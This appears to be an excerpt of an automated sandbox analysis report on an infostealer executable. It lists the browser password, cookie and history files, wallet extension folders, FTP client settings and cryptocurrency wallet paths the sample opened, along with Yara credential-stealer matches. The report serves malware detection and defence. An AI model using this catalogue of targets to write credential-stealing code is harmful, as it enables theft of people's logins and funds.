Source: 847ee125a0.exe, 00000024.00000003.2726906842.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: 847ee125a0.exe, 00000024.00000003.2676214242.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: 847ee125a0.exe, 00000027.00000003.2892006886.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 847ee125a0.exe, 00000024.00000003.2726906842.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 847ee125a0.exe, 00000024.00000003.2676214242.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: 847ee125a0.exe, 00000027.00000003.2892006886.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: 847ee125a0.exe, 00000024.00000003.2706124038.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 847ee125a0.exe, 00000024.00000003.2706124038.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Yara detected Credential Stealer
Source: Yara match File source: 00000027.00000003.2874353728.0000000001077000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2845341991.0000000001079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2788761085.0000000001076000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2820405749.0000000001076000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2874971732.000000000107A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2844621726.0000000001079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2821792665.000000000107B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2888844461.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
